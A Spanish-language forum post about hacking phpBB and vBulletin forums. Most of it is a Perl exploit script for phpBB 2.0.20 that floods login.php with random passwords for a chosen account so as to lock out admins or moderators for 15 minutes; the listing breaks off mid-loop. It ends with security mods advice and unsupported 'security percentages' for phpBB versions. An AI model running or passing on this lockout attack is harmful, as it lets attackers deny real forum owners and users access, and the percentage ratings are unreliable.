Bueno les informo que ya hay metodos de hackear foros de sistemas bases como:
(phpbb (en todas sus versiones) Vbulletin (en todas sus versiones)
pues como , psssss en todo foro es vulnerable a "ataques infomaticos"
esto se hace mediante "exploit" que se han generado gracias alos errores o bugs "de cualquier sistema de foros"
ejemplo de este (sistema de phpbb2)
Permite desactivar a cualquier usuario durante 15 minutos (incluido admins y mods)
Código: Seleccionar todo
###################################################################################
#!/usr/bin/perl
# For PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
# Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];
$dirsend = "$dirc" . "login.php";
print "
-------------------------------------
phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
--------------------------------------
";
$i=1;
if ($host ne ""){
while($OK ne 1){
use IO::Socket;
my($socket) ="";
if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
PeerPort => $port ,
Proto => "TCP"))
{
$password=rand();
$data = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length
$data";
read $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;
Todo esto , los hackers lo realizan con programa de "programacion" "hosting locales"etc.
Esto ya ha pasado en algunos foros , como en "forospyware" que la intentaron hackear hace 1 año
y psss yo queria saber si funcionaba xD y probe alguno scripts con mi foro de la "wishshop" que he creado y funciono xD.
Para evitar estos ataques es necesario tener instalados algunos "MODS" de seguridad
que se pueden encontrar en las paginas oficiales de estos sistemas de foros.
a continuacion dare informacion de las versiones de phpbb acerca del porcentaje de seguridad
PHPBB (25%)
PHPBB2 (60%)
PHPBB3 (75%)
PHPBB4 (80%)
__________esto es el porcentaje por ahora
aunque en eln futuro el porcentaje de algunos bajara.
por ahora la version mas segura de phppbb que hay es la "4"
Espero que esto les sirva a algunos "admins o dueños de foros" que haiga aqui.
